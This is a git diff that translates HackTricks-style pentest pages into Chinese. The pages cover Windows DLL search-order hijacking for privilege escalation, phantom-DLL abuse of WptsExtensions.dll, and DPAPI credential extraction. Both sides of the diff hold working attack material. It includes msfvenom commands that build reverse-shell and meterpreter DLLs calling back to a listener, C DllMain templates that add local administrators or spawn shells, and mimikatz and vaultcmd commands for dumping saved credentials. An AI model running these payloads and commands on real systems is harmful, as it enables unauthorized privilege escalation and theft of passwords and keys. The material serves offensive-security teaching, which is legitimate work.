+这是 **默认** 搜索顺序，启用 **SafeDllSearchMode**。当禁用时，当前目录提升到第二位。要禁用此功能，请创建 **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** 注册表值并将其设置为 0（默认启用）。
 
-If [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) function is called with **LOAD_WITH_ALTERED_SEARCH_PATH** the search begins in the directory of the executable module that **LoadLibraryEx** is loading.
+如果调用 [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) 函数时使用 **LOAD_WITH_ALTERED_SEARCH_PATH**，搜索将从 **LoadLibraryEx** 正在加载的可执行模块的目录开始。
 
-Finally, note that **a dll could be loaded indicating the absolute path instead just the name**. In that case that dll is **only going to be searched in that path** (if the dll has any dependencies, they are going to be searched as just loaded by name).
+最后，请注意 **dll 可以通过指示绝对路径而不是仅仅是名称来加载**。在这种情况下，该 dll **只会在该路径中被搜索**（如果 dll 有任何依赖项，它们将被作为仅通过名称加载进行搜索）。
 
-There are other ways to alter the ways to alter the search order but I'm not going to explain them here.
+还有其他方法可以更改搜索顺序，但我在这里不打算解释它们。
 
 #### Exceptions on dll search order from Windows docs
 
-Certain exceptions to the standard DLL search order are noted in Windows documentation:
+Windows 文档中指出了标准 DLL 搜索顺序的某些例外：
 
-- When a **DLL that shares its name with one already loaded in memory** is encountered, the system bypasses the usual search. Instead, it performs a check for redirection and a manifest before defaulting to the DLL already in memory. **In this scenario, the system does not conduct a search for the DLL**.
-- In cases where the DLL is recognized as a **known DLL** for the current Windows version, the system will utilize its version of the known DLL, along with any of its dependent DLLs, **forgoing the search process**. The registry key **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** holds a list of these known DLLs.
-- Should a **DLL have dependencies**, the search for these dependent DLLs is conducted as though they were indicated only by their **module names**, regardless of whether the initial DLL was identified through a full path.
+- 当遇到 **与内存中已加载的 DLL 同名的 DLL** 时，系统会绕过通常的搜索。相反，它会在默认使用内存中已加载的 DLL 之前执行重定向和清单检查。**在这种情况下，系统不会进行 DLL 搜索**。
+- 在 DLL 被识别为当前 Windows 版本的 **已知 DLL** 的情况下，系统将使用其版本的已知 DLL 及其任何依赖 DLL，**跳过搜索过程**。注册表项 **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** 保存这些已知 DLL 的列表。
+- 如果 **DLL 有依赖项**，则对这些依赖 DLL 的搜索将像仅通过其 **模块名称** 指示一样进行，而不管初始 DLL 是否通过完整路径识别。
 
 ### Escalating Privileges
 
 **Requirements**:
 
-- Identify a process that operates or will operate under **different privileges** (horizontal or lateral movement), which is **lacking a DLL**.
-- Ensure **write access** is available for any **directory** in which the **DLL** will be **searched for**. This location might be the directory of the executable or a directory within the system path.
+- 确定一个在 **不同权限** 下运行或将要运行的进程（水平或横向移动），该进程 **缺少 DLL**。
+- 确保在 **DLL** 将被 **搜索的任何目录** 中有 **写入权限**。此位置可能是可执行文件的目录或系统路径中的目录。
 
-Yeah, the requisites are complicated to find as **by default it's kind of weird to find a privileged executable missing a dll** and it's even **more weird to have write permissions on a system path folder** (you can't by default). But, in misconfigured environments this is possible.\
-In the case you are lucky and you find yourself meeting the requirements, you could check the [UACME](https://github.com/hfiref0x/UACME) project. Even if the **main goal of the project is bypass UAC**, you may find there a **PoC** of a Dll hijaking for the Windows version that you can use (probably just changing the path of the folder where you have write permissions).
-
-Note that you can **check your permissions in a folder** doing:
+是的，要求很难找到，因为 **默认情况下，找不到缺少 DLL 的特权可执行文件是有点奇怪的**，而且在系统路径文件夹中拥有写入权限更是 **奇怪**（默认情况下您无法做到）。但是，在配置错误的环境中，这是可能的。\
+如果您运气好，满足要求，可以查看 [UACME](https://github.com/hfiref0x/UACME) 项目。即使 **该项目的主要目标是绕过 UAC**，您也可能会在那里找到一个 Windows 版本的 DLL 劫持的 **PoC**（可能只需更改您有写入权限的文件夹的路径）。
 
+请注意，您可以通过以下方式 **检查文件夹中的权限**：
 ```bash
 accesschk.exe -dqv "C:\Python27"
 icacls "C:\Python27"
 ```
-
-And **check permissions of all folders inside PATH**:
-
+并**检查 PATH 中所有文件夹的权限**：
 ```bash
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
 ```
-
-You can also check the imports of an executable and the exports of a dll with:
-
+您还可以使用以下命令检查可执行文件的导入和 DLL 的导出：
 ```c
 dumpbin /imports C:\path\Tools\putty\Putty.exe
 dumpbin /export /path/file.dll
 ```
-
-For a full guide on how to **abuse Dll Hijacking to escalate privileges** with permissions to write in a **System Path folder** check:
+对于如何**利用Dll劫持提升权限**的完整指南，检查：
 
 {{#ref}}
 writable-sys-path-+dll-hijacking-privesc.md
 {{#endref}}
 
-### Automated tools
+### 自动化工具
 
-[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)will check if you have write permissions on any folder inside system PATH.\
-Other interesting automated tools to discover this vulnerability are **PowerSploit functions**: _Find-ProcessDLLHijack_, _Find-PathDLLHijack_ and _Write-HijackDll._
+[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)将检查您是否在系统PATH中的任何文件夹上具有写入权限。\
+其他发现此漏洞的有趣自动化工具包括**PowerSploit函数**：_Find-ProcessDLLHijack_，_Find-PathDLLHijack_和_Write-HijackDll_。
 
-### Example
+### 示例
 
-In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../../authentication-credentials-uac-and-efs/#uac) or from[ **High Integrity to SYSTEM**](../#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
-Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**.
+如果您发现一个可利用的场景，成功利用它的最重要的事情之一是**创建一个导出至少所有可执行文件将从中导入的函数的dll**。无论如何，请注意，Dll劫持在[**从中等完整性级别提升到高完整性级别（绕过UAC）**](../../authentication-credentials-uac-and-efs/#uac)或[**从高完整性提升到SYSTEM**](../#from-high-integrity-to-system)**时非常有用。**您可以在这个专注于执行的dll劫持研究中找到**如何创建有效dll的示例：[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
+此外，在**下一节**中，您可以找到一些**基本dll代码**，这些代码可能作为**模板**或用于创建**导出非必需函数的dll**。
 
-## **Creating and compiling Dlls**
+## **创建和编译Dll**
 
-### **Dll Proxifying**
+### **Dll代理**
 
-Basically a **Dll proxy** is a Dll capable of **execute your malicious code when loaded** but also to **expose** and **work** as **exected** by **relaying all the calls to the real library**.
+基本上，**Dll代理**是一个能够**在加载时执行您的恶意代码**的Dll，同时也能**暴露**并**按预期工作**，通过**将所有调用转发到真实库**。
 
-With the tool [**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant) or [**Spartacus**](https://github.com/Accenture/Spartacus) you can actually **indicate an executable and select the library** you want to proxify and **generate a proxified dll** or **indicate the Dll** and **generate a proxified dll**.
+使用工具[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)或[**Spartacus**](https://github.com/Accenture/Spartacus)，您可以**指定一个可执行文件并选择要代理的库**，并**生成一个代理dll**，或**指定Dll并生成一个代理dll**。
 
 ### **Meterpreter**
 
-**Get rev shell (x64):**
-
+**获取反向shell (x64)：**
 ```bash
 msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
-
-**Get a meterpreter (x86):**
-
+**获取一个 meterpreter (x86):**
 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
-
-**Create a user (x86 I didn't see a x64 version):**
-
+**创建用户（x86，我没有看到 x64 版本）：**
 ```
 msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
 ```
+### 你自己的
 
-### Your own
-
-Note that in several cases the Dll that you compile must **export several functions** that are going to be loaded by the victim process, if these functions doesn't exist the **binary won't be able to load** them and the **exploit will fail**.
-
+请注意，在多个情况下，您编译的 Dll 必须 **导出多个函数**，这些函数将被受害者进程加载，如果这些函数不存在，**二进制文件将无法加载**它们，**攻击将失败**。
 ```c
 // Tested in Win10
 // i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
 #include <windows.h>
 BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
-    switch(dwReason){
-        case DLL_PROCESS_ATTACH:
-            system("whoami > C:\\users\\username\\whoami.txt");
-            WinExec("calc.exe", 0); //This doesn't accept redirections like system
-            break;
-        case DLL_PROCESS_DETACH:
-            break;
-        case DLL_THREAD_ATTACH:
-            break;
-        case DLL_THREAD_DETACH:
-            break;
-    }
-    return TRUE;
+switch(dwReason){
+case DLL_PROCESS_ATTACH:
+system("whoami > C:\\users\\username\\whoami.txt");
+WinExec("calc.exe", 0); //This doesn't accept redirections like system
+break;
+case DLL_PROCESS_DETACH:
+break;
+case DLL_THREAD_ATTACH:
+break;
+case DLL_THREAD_DETACH:
+break;
+}
+return TRUE;
 }
 ```
 
@@ -179,11 +165,11 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
 
 #include <windows.h>
 BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
-    if (dwReason == DLL_PROCESS_ATTACH){
-        system("cmd.exe /k net localgroup administrators user /add");
-        ExitProcess(0);
-    }
-    return TRUE;
+if (dwReason == DLL_PROCESS_ATTACH){
+system("cmd.exe /k net localgroup administrators user /add");
+ExitProcess(0);
+}
+return TRUE;
 }
 ```
 
@@ -195,15 +181,15 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
 
 int owned()
 {
-  WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
-  exit(0);
-  return 0;
+WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
+exit(0);
+return 0;
 }
 
 BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 {
-  owned();
-  return 0;
+owned();
+return 0;
 }
 ```
 
@@ -216,33 +202,31 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 #include<stdio.h>
 
 void Entry (){ //Default function that is executed when the DLL is loaded
-    system("cmd");
+system("cmd");
 }
 
 BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
-    switch (ul_reason_for_call){
-        case DLL_PROCESS_ATTACH:
-            CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
-            break;
-        case DLL_THREAD_ATTACH:
-        case DLL_THREAD_DETACH:
-        case DLL_PROCESS_DEATCH:
-            break;
-    }
-    return TRUE;
+switch (ul_reason_for_call){
+case DLL_PROCESS_ATTACH:
+CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
+break;
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+case DLL_PROCESS_DEATCH:
+break;
+}
+return TRUE;
 }
 ```
-
-## References
+## 参考
 
 - [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
 - [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
 
 <figure><img src="../../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 626de6839..ff28f08e2 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -2,84 +2,81 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Introduction
+## 介绍
 
-If you found that you can **write in a System Path folder** (note that this won't work if you can write in a User Path folder) it's possible that you could **escalate privileges** in the system.
+如果你发现你可以**在系统路径文件夹中写入**（注意，如果你可以在用户路径文件夹中写入，这将不起作用），那么你可能可以**提升系统权限**。
 
-In order to do that you can abuse a **Dll Hijacking** where you are going to **hijack a library being loaded** by a service or process with **more privileges** than yours, and because that service is loading a Dll that probably doesn't even exist in the entire system, it's going to try to load it from the System Path where you can write.
+为了做到这一点，你可以利用**Dll Hijacking**，你将**劫持一个被服务或进程加载的库**，该服务或进程的**权限高于你的**，而且因为该服务正在加载一个可能在整个系统中根本不存在的Dll，它将尝试从你可以写入的系统路径加载它。
 
-For more info about **what is Dll Hijackig** check:
+有关**什么是Dll Hijacking**的更多信息，请查看：
 
 {{#ref}}
 ./
 {{#endref}}
 
-## Privesc with Dll Hijacking
+## 使用Dll Hijacking进行权限提升
 
-### Finding a missing Dll
+### 查找缺失的Dll
 
-The first thing you need is to **identify a process** running with **more privileges** than you that is trying to **load a Dll from the System Path** you can write in.
+你需要做的第一件事是**识别一个运行权限高于你的进程**，该进程正在尝试**从你可以写入的系统路径加载Dll**。
 
-The problem in this cases is that probably thoses processes are already running. To find which Dlls are lacking the services you need to launch procmon as soon as possible (before processes are loaded). So, to find lacking .dlls do:
-
-- **Create** the folder `C:\privesc_hijacking` and add the path `C:\privesc_hijacking` to **System Path env variable**. You can do this **manually** or with **PS**:
+在这种情况下的问题是，这些进程可能已经在运行。要找出哪些Dll缺失，你需要尽快启动procmon（在进程加载之前）。因此，要查找缺失的.dll，请执行以下操作：
 
+- **创建**文件夹`C:\privesc_hijacking`并将路径`C:\privesc_hijacking`添加到**系统路径环境变量**。你可以**手动**完成此操作或使用**PS**：
 ```powershell
 # Set the folder path to create and check events for
 $folderPath = "C:\privesc_hijacking"
 
 # Create the folder if it does not exist
 if (!(Test-Path $folderPath -PathType Container)) {
-    New-Item -ItemType Directory -Path $folderPath | Out-Null
+New-Item -ItemType Directory -Path $folderPath | Out-Null
 }
 
 # Set the folder path in the System environment variable PATH
 $envPath = [Environment]::GetEnvironmentVariable("PATH", "Machine")
 if ($envPath -notlike "*$folderPath*") {
-    $newPath = "$envPath;$folderPath"
-    [Environment]::SetEnvironmentVariable("PATH", $newPath, "Machine")
+$newPath = "$envPath;$folderPath"
+[Environment]::SetEnvironmentVariable("PATH", $newPath, "Machine")
 }
 ```
-
-- Launch **`procmon`** and go to **`Options`** --> **`Enable boot logging`** and press **`OK`** in the prompt.
-- Then, **reboot**. When the computer is restarted **`procmon`** will start **recording** events asap.
-- Once **Windows** is **started execute `procmon`** again, it'll tell you that it has been running and will **ask you if you want to store** the events in a file. Say **yes** and **store the events in a file**.
-- **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
-- Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
+- 启动 **`procmon`**，然后转到 **`Options`** --> **`Enable boot logging`**，在提示中按 **`OK`**。
+- 然后，**重启**。当计算机重新启动时，**`procmon`** 将开始尽快 **记录** 事件。
+- 一旦 **Windows** 启动，再次执行 **`procmon`**，它会告诉你它已经在运行，并会 **询问你是否想将** 事件存储在文件中。选择 **是** 并 **将事件存储在文件中**。
+- **在** **文件** 生成后，**关闭** 打开的 **`procmon`** 窗口并 **打开事件文件**。
+- 添加这些 **过滤器**，你将找到一些 **进程尝试从可写的系统路径文件夹加载的所有 Dll**：
 
 <figure><img src="../../../images/image (945).png" alt=""><figcaption></figcaption></figure>
 
-### Missed Dlls
+### 漏掉的 Dll
 
-Running this in a free **virtual (vmware) Windows 11 machine** I got these results:
+在一台免费的 **虚拟 (vmware) Windows 11 机器** 上运行此操作，我得到了这些结果：
 
 <figure><img src="../../../images/image (607).png" alt=""><figcaption></figcaption></figure>
 
-In this case the .exe are useless so ignore them, the missed DLLs where from:
+在这种情况下，.exe 是无用的，所以忽略它们，漏掉的 DLL 来自：
 
-| Service                         | Dll                | CMD line                                                             |
-| ------------------------------- | ------------------ | -------------------------------------------------------------------- |
-| Task Scheduler (Schedule)       | WptsExtensions.dll | `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule`          |
-| Diagnostic Policy Service (DPS) | Unknown.DLL        | `C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS` |
-| ???                             | SharedRes.dll      | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup`                |
+| 服务                             | Dll                | CMD 行                                                               |
+| -------------------------------- | ------------------ | -------------------------------------------------------------------- |
+| 任务调度程序 (Schedule)          | WptsExtensions.dll | `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule`          |
+| 诊断策略服务 (DPS)              | Unknown.DLL        | `C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS` |
+| ???                              | SharedRes.dll      | `C:\Windows\system32\svchost.exe -k UnistackSvcGroup`                |
 
-After finding this, I found this interesting blog post that also explains how to [**abuse WptsExtensions.dll for privesc**](https://juggernaut-sec.com/dll-hijacking/#Windows_10_Phantom_DLL_Hijacking_-_WptsExtensionsdll). Which is what we **are going to do now**.
+找到这个之后，我发现了一篇有趣的博客文章，也解释了如何 [**滥用 WptsExtensions.dll 进行权限提升**](https://juggernaut-sec.com/dll-hijacking/#Windows_10_Phantom_DLL_Hijacking_-_WptsExtensionsdll)。这正是我们 **现在要做的**。
 
-### Exploitation
+### 利用
 
-So, to **escalate privileges** we are going to hijack the library **WptsExtensions.dll**. Having the **path** and the **name** we just need to **generate the malicious dll**.
+因此，为了 **提升权限**，我们将劫持库 **WptsExtensions.dll**。拥有 **路径** 和 **名称** 后，我们只需 **生成恶意 dll**。
 
-You can [**try to use any of these examples**](./#creating-and-compiling-dlls). You could run payloads such as: get a rev shell, add a user, execute a beacon...
+你可以 [**尝试使用这些示例中的任何一个**](./#creating-and-compiling-dlls)。你可以运行有效载荷，例如：获取反向 shell，添加用户，执行信标...
 
 > [!WARNING]
-> Note that **not all the service are run** with **`NT AUTHORITY\SYSTEM`** some are also run with **`NT AUTHORITY\LOCAL SERVICE`** which has **less privileges** and you **won't be able to create a new user** abuse its permissions.\
-> However, that user has the **`seImpersonate`** privilege, so you can use the[ **potato suite to escalate privileges**](../roguepotato-and-printspoofer.md). So, in this case a rev shell is a better option that trying to create a user.
+> 请注意，**并非所有服务都以** **`NT AUTHORITY\SYSTEM`** 运行，有些服务也以 **`NT AUTHORITY\LOCAL SERVICE`** 运行，该服务具有 **较少的权限**，你 **将无法创建新用户** 来滥用其权限。\
+> 然而，该用户具有 **`seImpersonate`** 权限，因此你可以使用[ **potato suite 来提升权限**](../roguepotato-and-printspoofer.md)。因此，在这种情况下，反向 shell 是比尝试创建用户更好的选择。
 
-At the moment of writing the **Task Scheduler** service is run with **Nt AUTHORITY\SYSTEM**.
+在撰写时，**任务调度程序** 服务是以 **Nt AUTHORITY\SYSTEM** 运行的。
 
-Having **generated the malicious Dll** (_in my case I used x64 rev shell and I got a shell back but defender killed it because it was from msfvenom_), save it in the writable System Path with the name **WptsExtensions.dll** and **restart** the computer (or restart the service or do whatever it takes to rerun the affected service/program).
+生成了恶意 Dll 之后（_在我的情况下，我使用了 x64 反向 shell，并且我得到了一个 shell，但防御者杀死了它，因为它来自 msfvenom_），将其保存到可写的系统路径中，命名为 **WptsExtensions.dll**，并 **重启** 计算机（或重启服务，或做任何需要的事情以重新运行受影响的服务/程序）。
 
-When the service is re-started, the **dll should be loaded and executed** (you can **reuse** the **procmon** trick to check if the **library was loaded as expected**).
+当服务重新启动时，**dll 应该被加载和执行**（你可以 **重用** **procmon** 技巧来检查 **库是否按预期加载**）。
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index bd48a4ae9..200b8c9a0 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -1,29 +1,28 @@
-# DPAPI - Extracting Passwords
+# DPAPI - 提取密码
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**，是各个学科的技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
-## What is DPAPI
+## 什么是 DPAPI
 
-The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the **symmetric encryption of asymmetric private keys**, leveraging either user or system secrets as a significant source of entropy. This approach simplifies encryption for developers by enabling them to encrypt data using a key derived from the user's logon secrets or, for system encryption, the system's domain authentication secrets, thus obviating the need for developers to manage the protection of the encryption key themselves.
+数据保护 API (DPAPI) 主要用于 Windows 操作系统中 **对非对称私钥进行对称加密**，利用用户或系统秘密作为重要的熵来源。这种方法通过允许开发人员使用从用户登录秘密派生的密钥进行数据加密，或在系统加密中使用系统的域认证秘密，从而简化了加密过程，避免了开发人员自己管理加密密钥保护的需要。
 
-### Protected Data by DPAPI
+### DPAPI 保护的数据
 
-Among the personal data protected by DPAPI are:
+DPAPI 保护的个人数据包括：
 
-- Internet Explorer and Google Chrome's passwords and auto-completion data
-- E-mail and internal FTP account passwords for applications like Outlook and Windows Mail
-- Passwords for shared folders, resources, wireless networks, and Windows Vault, including encryption keys
-- Passwords for remote desktop connections, .NET Passport, and private keys for various encryption and authentication purposes
-- Network passwords managed by Credential Manager and personal data in applications using CryptProtectData, such as Skype, MSN messenger, and more
-
-## List Vault
+- Internet Explorer 和 Google Chrome 的密码和自动完成数据
+- Outlook 和 Windows Mail 等应用程序的电子邮件和内部 FTP 账户密码
+- 共享文件夹、资源、无线网络和 Windows Vault 的密码，包括加密密钥
+- 远程桌面连接、.NET Passport 和各种加密和认证目的的私钥密码
+- 由凭据管理器管理的网络密码以及使用 CryptProtectData 的应用程序中的个人数据，如 Skype、MSN messenger 等
 
+## 列表 Vault
 ```bash
 # From cmd
 vaultcmd /listcreds:"Windows Credentials" /all
@@ -31,20 +30,16 @@ vaultcmd /listcreds:"Windows Credentials" /all
 # From mimikatz
 mimikatz vault::list
 ```
+## 凭据文件
 
-## Credential Files
-
-The **credentials files protected** could be located in:
-
+**受保护的凭据文件**可能位于：
 ```
 dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
 dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
-
-Get credentials info using mimikatz `dpapi::cred`, in the response you can find interesting info such as the encrypted data and the guidMasterKey.
-
+使用 mimikatz `dpapi::cred` 获取凭据信息，在响应中可以找到有趣的信息，例如加密数据和 guidMasterKey。
 ```bash
 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
 
@@ -54,17 +49,13 @@ guidMasterKey      : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
 pbData             : b8f619[...snip...]b493fe
 [..]
 ```
-
-You can use **mimikatz module** `dpapi::cred` with the appropiate `/masterkey` to decrypt:
-
+您可以使用 **mimikatz module** `dpapi::cred` 和适当的 `/masterkey` 进行解密：
 ```
 dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>
 ```
+## 主密钥
 
-## Master Keys
-
-The DPAPI keys used for encrypting the user's RSA keys are stored under `%APPDATA%\Microsoft\Protect\{SID}` directory, where {SID} is the [**Security Identifier**](https://en.wikipedia.org/wiki/Security_Identifier) **of that user**. **The DPAPI key is stored in the same file as the master key that protects the users private keys**. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it using`dir` from the cmd, but you can list it from PS).
-
+用于加密用户 RSA 密钥的 DPAPI 密钥存储在 `%APPDATA%\Microsoft\Protect\{SID}` 目录下，其中 {SID} 是该用户的 [**安全标识符**](https://en.wikipedia.org/wiki/Security_Identifier)。**DPAPI 密钥与保护用户私钥的主密钥存储在同一个文件中**。它通常是 64 字节的随机数据。（请注意，此目录受到保护，因此您无法使用 `dir` 从 cmd 列出它，但您可以从 PS 列出它）。
 ```bash
 Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
 Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
@@ -73,45 +64,43 @@ Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
 Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
 Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
 ```
-
-This is what a bunch of Master Keys of a user will looks like:
+这是一组用户的主密钥的样子：
 
 ![](<../../images/image (1121).png>)
 
-Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it.
+通常**每个主密钥是一个加密的对称密钥，可以解密其他内容**。因此，**提取** **加密的主密钥**是有趣的，以便**稍后解密**用它加密的**其他内容**。
 
-### Extract master key & decrypt
+### 提取主密钥并解密
 
-Check the post [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#extracting-dpapi-backup-keys-with-domain-admin) for an example of how to extract the master key and decrypt it.
+查看帖子 [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#extracting-dpapi-backup-keys-with-domain-admin) 以获取提取主密钥并解密的示例。
 
 ## SharpDPAPI
 
-[SharpDPAPI](https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1) is a C# port of some DPAPI functionality from [@gentilkiwi](https://twitter.com/gentilkiwi)'s [Mimikatz](https://github.com/gentilkiwi/mimikatz/) project.
+[SharpDPAPI](https://github.com/GhostPack/SharpDPAPI#sharpdpapi-1) 是[@gentilkiwi](https://twitter.com/gentilkiwi)的[Mimikatz](https://github.com/gentilkiwi/mimikatz/)项目中一些DPAPI功能的C#移植。
 
 ## HEKATOMB
 
-[**HEKATOMB**](https://github.com/Processus-Thief/HEKATOMB) is a tool that automates the extraction of all users and computers from the LDAP directory and the extraction of domain controller backup key through RPC. The script will then resolve all computers ip address and perform a smbclient on all computers to retrieve all DPAPI blobs of all users and decrypt everything with domain backup key.
+[**HEKATOMB**](https://github.com/Processus-Thief/HEKATOMB) 是一个自动提取LDAP目录中所有用户和计算机的工具，并通过RPC提取域控制器备份密钥。然后，脚本将解析所有计算机的IP地址，并在所有计算机上执行smbclient以检索所有用户的DPAPI blob，并使用域备份密钥解密所有内容。
 
 `python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp`
 
-With extracted from LDAP computers list you can find every sub network even if you didn't know them !
+通过从LDAP提取的计算机列表，您可以找到每个子网络，即使您不知道它们！
 
-"Because Domain Admin rights are not enough. Hack them all."
+“因为域管理员权限还不够。黑掉他们所有人。”
 
 ## DonPAPI
 
-[**DonPAPI**](https://github.com/login-securite/DonPAPI) can dump secrets protected by DPAPI automatically.
+[**DonPAPI**](https://github.com/login-securite/DonPAPI) 可以自动转储受DPAPI保护的秘密。
 
-## References
+## 参考
 
